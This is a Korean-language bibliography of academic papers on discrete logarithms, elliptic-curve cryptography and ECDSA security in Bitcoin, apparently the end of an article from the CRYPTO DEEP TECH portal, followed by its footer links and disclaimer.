- 이산 대수와 숨겨진 순서가 있는 그룹의 표현에 대한 지식의 효율적 증명 Endre Bangerter, Jan Camenisch 및 Ueli Maurer IBM Research, Zurich Research Lab, CH-8803 Rueschlikon, Switzerland Departement of Computer Science, ETH Zurich, CH-8092 Zurich, Switzerland
- 이산 로그에 관한 일반 진술을 위한 증명 시스템 Jan Camenisch Dept. of Computer Science Haldeneggsteig 4 ETH Zurich CH-8092 Zurich, Switzerland Markus Stadler Union Bank of Switzerland Ubilab Bahnhofstrasse 45 CH-8021 Zurich, Switzerland
- 디피-헬만 문제가 이산 로그 계산만큼 어렵다는 증거 Jonah Brown-Cohen
- 분할성, 매끄러움 및 암호화 응용 프로그램 David Naccache 암호학부 ´ Ecole normale sup´erieure ´ 45 rue d’Ulm, F-75230 Paris, Cedex 05, France Igor E. Shparlinski Macquarie University 컴퓨팅학과 Sydney, NSW 2109, Australia 2008년 10월 17일
- CDLS: 건전성을 갖춘 커밋된 이산 대수에 대한 지식 증명 Sofia Celi, Shai Levin 및 Joe Rowell Brave Software, 오클랜드 대학교, Royal Holloway, 런던 대학교
- 기본 이산 대수 알고리즘 “공개 키 암호화의 수학” Steven Galbraith 지음
- 작은 이산 대수를 더 빠르게 계산하기 Daniel J. Bernstein 및 Tanja Lange 일리노이 대학교 컴퓨터 과학과, 시카고, IL 60607–7053, 미국 수학과 컴퓨터 과학과 Technische Universiteit Eindhoven, PO Box 513, 5600 MB Eindhoven, 네덜란드
- 타원 곡선의 이산 대수 Aaron Blumenfeld 로체스터 대학교
- 과거, 진화하는 현재, 이산 대수의 미래 Antoine Joux, Andrew Odlyzko 및 Cécile Pierrot
- 유한 필드의 이산 대수와 그 암호화적 중요성 AM Odlyzko AT&T Bell Laboratories Murray Hill, New Jersey
- Discreet Log Contracts Thaddeus Dryja MIT 디지털 통화 이니셔티브
- GF(36n)에서 676비트 이산대수 문제 풀기 Takuya Hayashi, Naoyuki Shinohara, Lihua Wang, Shin’ichiro Matsuo, Masaaki Shirase, Tsuyoshi Takagi 미래대학교, 일본 하코다테. 일본 국립정보통신기술원.
- ECDSA 비트코인 및 이더리움의 보안: 연구 설문 조사 Hartwig Mayer CoinFabrik 2016년 6월 28일 개정
- 뒤틀린 에드워드 곡선을 사용한 비트코인 보안 Meryem Cherkaoui Semmouni, Abderrahmane Nitaj, Mostafa Belkasmi
- GL(n, q)의 이산 대수 문제 Alfred J. Menezes 및 Yi-Hong Wu 이산 및 통계 과학과 120 수학 별관 오번 대학교
- 트레이스 1의 타원 곡선에 대한 이산 대수 문제 Nigel P. Smart Network Systems Department HP Laboratories Bristol 1997년 10월
- 타원 곡선 디지털 서명 및 비트코인 암호화폐 거래에서의 응용 Benjamin K. Kikwai 2017년 10월 16일
- 비트코인의 수학: Lewis Combes의 ECDSA MA4K8 학술 보고서가 워릭 대학교 수학 연구소에 제출됨 2018년 4월
- 갈루아 링의 이산 로그 Samuel Bertrand Liyimbeme Mouchili 아프리카 수학 과학 연구소(AIMS)-카메룬 동문, 카메룬
- 이산 대수 문제와 암호학에서의 응용 Roger Oyono, 프랑스령 폴리네시아 대학교, 타히티, 2009년 4월 마드리드 마스터 클래스를 위한 암호학 강의
- 이산 대수 문제 Rene Schoof
- 이산 대수에서 비대칭 암호화 Benjamin Smith 실제 세계 암호화 및 프라이버시에 대한 여름 학교 크로아티아 시베니크 // 2019년 6월 17일
- 기울기 기반 방법을 사용한 이산 대수 학습의 난해성 Rustem Takhanov Maxat Tezekbayev Artur Pak 카자흐스탄 아스타나 나자르바예프 대학교 수학과 Arman Bolatov 카자흐스탄 아스타나 나자르바예프 대학교 컴퓨터 과학과 Zhibek Kadyrsizova 카자흐스탄 아스타나 나자르바예프 대학교 수학과 Zhenisbek Assylbekov 미국 인디애나주 포트 웨인에 있는 퍼듀 대학교 수학과
- 암호화의 이산 로그 Frederik Vercauteren ESAT/COSIC — KU Leuven ECRYPT 여름 학교 2008
- 이산 로그 문제와 타원 곡선 암호화 놀런 윙클러
이 자료는 CRYPTO DEEP TECH 포털을 위해 만들어졌으며, 비트코인 암호화폐의 약한 ECDSA 서명에 대한 타원 곡선 secp256k1 의 금융 데이터 보안 및 암호화를 보장합니다 . 소프트웨어 제작자는 자료 사용에 대한 책임을 지지 않습니다.
텔레그램: https://t.me/cryptodeeptech
비디오: https://youtu.be/i9KYih_ffr8
비디오 튜토리얼: https://dzen.ru/video/watch/6784be61b09e46422395c236
출처: https://cryptodeeptech.ru/discrete-logarithm
